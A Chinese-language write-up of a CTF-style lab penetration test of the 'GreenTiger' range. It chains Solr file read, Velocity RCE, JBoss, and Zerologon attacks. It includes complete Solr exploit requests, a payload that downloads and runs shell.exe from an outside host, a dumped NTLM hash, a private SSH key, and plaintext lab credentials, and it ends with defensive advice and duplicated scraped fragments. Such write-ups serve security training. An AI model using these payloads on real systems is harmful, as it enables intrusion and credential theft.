CyberStrikeLab GreenTiger 靶场渗透测试报告<\/h1>

1. 初始信息收集<\/h2>

目标IP: 172.5.5.5<\/code><\/li>

开放端口和服务:

80\/tcp: Apache Solr服务<\/li>
135\/tcp: Microsoft Windows RPC<\/li>
139\/tcp: NetBIOS<\/li>
445\/tcp: SMB<\/li>
5985\/tcp: WinRM (HTTPAPI)<\/li>
<\/ul>
<\/li>
<\/ul>
2. Solr服务漏洞利用<\/h2>
2.1 任意文件读取漏洞 (CVE-2024-45216)<\/h3>
漏洞验证:<\/strong><\/p>
POST<\/span> \/solr\/cslab\/debug\/dump:\/admin\/info\/key?param=ContentStreams&stream.url=file:\/\/\/flag.txt HTTP<\/span>\/<\/span>1.1<\/span>
<\/span><\/span>Host:<\/span> 172.5.5.5<\/span>
<\/span><\/span>User-Agent:<\/span> Mozilla\/5.0<\/span>
<\/span><\/span>Accept:<\/span> text\/html,application\/xhtml+xml<\/span>
<\/span><\/span>Connection:<\/span> keep-alive<\/span>
<\/span><\/span>SolrAuth:<\/span> test<\/span>
<\/span><\/span>Content-Type:<\/span> application\/json<\/span>
<\/span><\/span>Content-Length:<\/span> 0<\/span>
<\/span><\/span><\/code><\/pre>成功响应:<\/strong><\/p>
{
<\/span><\/span>  "responseHeader"<\/span>:{...<\/span>},
<\/span><\/span>  "streams"<\/span>:[
<\/span><\/span>    {...<\/span>},
<\/span><\/span>    {
<\/span><\/span>      "stream"<\/span>:"   _____                  _______ _                 \r\n  \/ ____|                |__   __(_)                \r\n | |  __ _ __ ___  ___ _ __ | |   _  __ _  ___ _ __ \r\n | | |_ | '__\/ _ \\\/ _ \\ '_ \\| |  | |\/ _` |\/ _ \\ '__|\r\n | |__| | | |  __\/  __\/ | | | |  | | (_| |  __\/ |   \r\n  \\_____|_|  \\___|\\___|_| |_|_|  |_|\\__, |\\___|_|   \r\n                                     __\/ |          \r\n                                    |___\/           \r\nGreenTiger-cslab{97bcad867}"<\/span>
<\/span><\/span>    }
<\/span><\/span>  ]
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>获取flag1:<\/strong> GreenTiger-cslab{97bcad867}<\/code><\/p>
2.2 远程代码执行漏洞<\/h3>
步骤1: 获取节点名称<\/strong><\/p>
POST<\/span> \/solr\/admin\/cores:\/admin\/info\/key?indexInfo=false&wt=json HTTP<\/span>\/<\/span>1.1<\/span>
<\/span><\/span>Host:<\/span> 172.5.5.5<\/span>
<\/span><\/span>User-Agent:<\/span> python-requests\/2.27.1<\/span>
<\/span><\/span>Content-Length:<\/span> 0<\/span>
<\/span><\/span><\/code><\/pre>响应确认节点名称为cslab<\/code><\/strong><\/p>
步骤2: 修改Solr配置<\/strong><\/p>
POST<\/span> \/solr\/cslab\/config HTTP<\/span>\/<\/span>1.1<\/span>
<\/span><\/span>Host:<\/span> 172.5.5.5<\/span>
<\/span><\/span>Content-Type:<\/span> application\/json<\/span>
<\/span><\/span>Content-Length:<\/span> 363<\/span>
<\/span><\/span>
<\/span><\/span>{
<\/span><\/span>  "update-queryresponsewriter"<\/span>: {
<\/span><\/span>    "startup"<\/span>: "lazy"<\/span>,
<\/span><\/span>    "name"<\/span>: "velocity"<\/span>,
<\/span><\/span>    "class"<\/span>: "solr.VelocityResponseWriter"<\/span>,
<\/span><\/span>    "template.base.dir"<\/span>: ""<\/span>,
<\/span><\/span>    "solr.resource.loader.enabled"<\/span>: "true"<\/span>,
<\/span><\/span>    "params.resource.loader.enabled"<\/span>: "true"<\/span>
<\/span><\/span>  }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>步骤3: 执行命令<\/strong><\/p>
GET<\/span> \/solr\/cslab\/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27whoami%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end HTTP<\/span>\/<\/span>1.1<\/span>
<\/span><\/span>Host:<\/span> 172.5.5.5<\/span>
<\/span><\/span>User-Agent:<\/span> curl\/8.1.2<\/span>
<\/span><\/span><\/code><\/pre>3. 权限提升与横向移动<\/h2>
3.1 获取系统权限<\/h3>
下载并执行恶意载荷:<\/strong><\/p>
GET<\/span> \/solr\/cslab\/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27powershell%20-c%20curl%20172.16.233.2\/shell.exe%20-O%20shell.exe%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end HTTP<\/span>\/<\/span>1.1<\/span>
<\/span><\/span><\/code><\/pre>执行载荷:<\/strong><\/p>
GET<\/span> \/solr\/cslab\/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27shell.exe%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end HTTP<\/span>\/<\/span>1.1<\/span>
<\/span><\/span><\/code><\/pre>3.2 获取凭证信息<\/h3>
修改管理员密码:<\/strong><\/p>
net user administrator passw0rd@1234
<\/code><\/pre>
获取哈希值:<\/strong><\/p>
Administrator:500:aad3b435b51404eeaad3b435b51404ee:544bb46748b4972b7566995e6eb29bdb:::
<\/code><\/pre>
3.3 发现新网段<\/h3>
IP配置信息:<\/strong><\/p>
以太网适配器 以太网实例:
  IPv4 地址 . . . . . . . . . . . . : 172.5.5.5
  子网掩码  . . . . . . . . . . . . : 255.255.255.0
  默认网关. . . . . . . . . . . . . : 172.5.5.233

以太网适配器 以太网实例 0:
  IPv4 地址 . . . . . . . . . . . . : 172.6.6.5
  子网掩码  . . . . . . . . . . . . : 255.255.255.0
  默认网关. . . . . . . . . . . . . : 172.6.6.1
<\/code><\/pre>
4. 横向移动到172.6.6.0\/24网段<\/h2>
4.1 扫描结果<\/h3>
[+] 端口开放 172.6.6.8:445
[+] 端口开放 172.6.6.8:139
[+] 端口开放 172.6.6.8:135
[+] 端口开放 172.6.6.8:80
[+] 端口开放 172.6.6.8:5985
[+] 端口开放 172.6.6.8:8080 (JBoss)
<\/code><\/pre>
4.2 JBoss漏洞利用 (CVE-2017-12149)<\/h3>
发现JBoss服务在8080端口<\/strong><\/p>
利用工具:<\/strong> CVE-2017-12149 Exploit<\/a><\/p>
4.3 获取SSH私钥<\/h3>
在C:\Users\Administrator\.ollama<\/code>目录下发现:<\/p>
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZWQyNTUxOQAAACB\/UrRhCTDNLTm5XXxSKdQzBvhbfr1wU3D7DVZab0\/cEgAAAIjVcO0A1XDtAAAAAAtzc2gtZWQyNTUxOQAAACB\/UrRhCTDNLTm5XXxSKdQzBvhbfr1wU3D7DVZab0\/cEgAAAED4+EWX+1SQPqS276eHKFlWjVq\/AqTR3iwnt33y4voOkX9StGEJMM0tObldfFIp1DMG+Ft+vXBTcPsNVlpvT9wSAAAAAAECAwQF
-----END OPENSSH PRIVATE KEY-----
<\/code><\/pre>
对应公钥:<\/p>
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIH9StGEJMM0tObldfFIp1DMG+Ft+vXBTcPsNVlpvT9wS
<\/code><\/pre>
4.4 获取自动登录凭证<\/h3>
通过winpeas或直接查询注册表获取自动登录凭证:<\/p>
cslabwow : cyber@w0w
<\/code><\/pre>
获取flag2<\/strong><\/p>
5. 横向移动到10.8.8.0\/24网段<\/h2>
5.1 发现WSUS服务器 (10.8.8.60)<\/h3>
利用WSUS漏洞进行横向移动<\/strong><\/p>
参考:<\/p>

通过WSUS进行横向移动<\/a><\/li>
WSUS漏洞分析<\/a><\/li>
<\/ul>
5.2 非预期解 - Zerologon攻击<\/h3>
步骤:<\/strong><\/p>

使用zerologon漏洞将DC$的hash置空<\/li>
备份注册表: reg save HKLM\SYSTEM system.backup<\/code><\/li>
下载注册表备份<\/li>
获取原始密码hash: 50176188318d8b122f6d60e0170f906c<\/code><\/li>
恢复密码<\/li>
验证hash已恢复<\/li>
<\/ol>
获取flag4<\/strong><\/p>
6. 总结<\/h2>
关键漏洞利用链<\/h3>

Solr任意文件读取 (CVE-2024-45216) → 获取flag1<\/li>
Solr Velocity模板注入 → RCE → 系统权限<\/li>
内网信息收集 → 发现新网段172.6.6.0\/24<\/li>
JBoss反序列化 (CVE-2017-12149) → 获取SSH私钥<\/li>
自动登录凭证收集 → 获取flag2<\/li>
WSUS漏洞或Zerologon → 域控权限 → 获取flag4<\/li>
<\/ol>
关键命令总结<\/h3>

Solr文件读取: POST \/solr\/cslab\/debug\/dump:\/admin\/info\/key?param=ContentStreams&stream.url=file:\/\/\/flag.txt<\/code><\/li>
Solr RCE: Velocity模板注入payload<\/li>
哈希获取: hashdump<\/code><\/li>
网络发现: ipconfig<\/code>, netstat -ano<\/code>, fscan<\/code>扫描<\/li>
横向移动: WSUS漏洞或Zerologon攻击<\/li>
<\/ul>
防御建议<\/h3>

及时更新Solr到最新版本<\/li>
禁用Solr Velocity模板功能<\/li>
加强内网隔离，限制横向移动<\/li>
定期检查自动登录凭证<\/li>
及时安装WSUS和域控相关补丁<\/li>
监控异常的网络流量和认证请求<\/li>
<\/ol>

CyberStrikeLab GreenTiger 靶场渗透测试报告<\/h1>

2. Solr服务漏洞利用<\/h2>

3. 权限提升与横向移动<\/h2>

4. 横向移动到172.6.6.0\/24网段<\/h2>

4.2 JBoss漏洞利用 (CVE-2017-12149)<\/h3> 发现JBoss服务在8080端口<\/strong><\/p> 利用工具:<\/strong> CVE-2017-12149 Exploit<\/a><\/p>

4.4 获取自动登录凭证<\/h3> 通过winpeas或直接查询注册表获取自动登录凭证:<\/p>

5. 横向移动到10.8.8.0\/24网段<\/h2> 5.1 发现WSUS服务器 (10.8.8.60)<\/h3> 利用WSUS漏洞进行横向移动<\/strong><\/p> 参考:<\/p>

5.1 发现WSUS服务器 (10.8.8.60)<\/h3> 利用WSUS漏洞进行横向移动<\/strong><\/p> 参考:<\/p>

防御建议<\/h3> 及时更新Solr到最新版本<\/li> 禁用Solr Velocity模板功能<\/li> 加强内网隔离，限制横向移动<\/li> 定期检查自动登录凭证<\/li> 及时安装WSUS和域控相关补丁<\/li> 监控异常的网络流量和认证请求<\/li> <\/ol>

4.2 JBoss漏洞利用 (CVE-2017-12149)<\/h3>
发现JBoss服务在8080端口<\/strong><\/p>
利用工具:<\/strong> CVE-2017-12149 Exploit<\/a><\/p>

防御建议<\/h3>

及时更新Solr到最新版本<\/li>
禁用Solr Velocity模板功能<\/li>
加强内网隔离，限制横向移动<\/li>
定期检查自动登录凭证<\/li>
及时安装WSUS和域控相关补丁<\/li>
监控异常的网络流量和认证请求<\/li> <\/ol>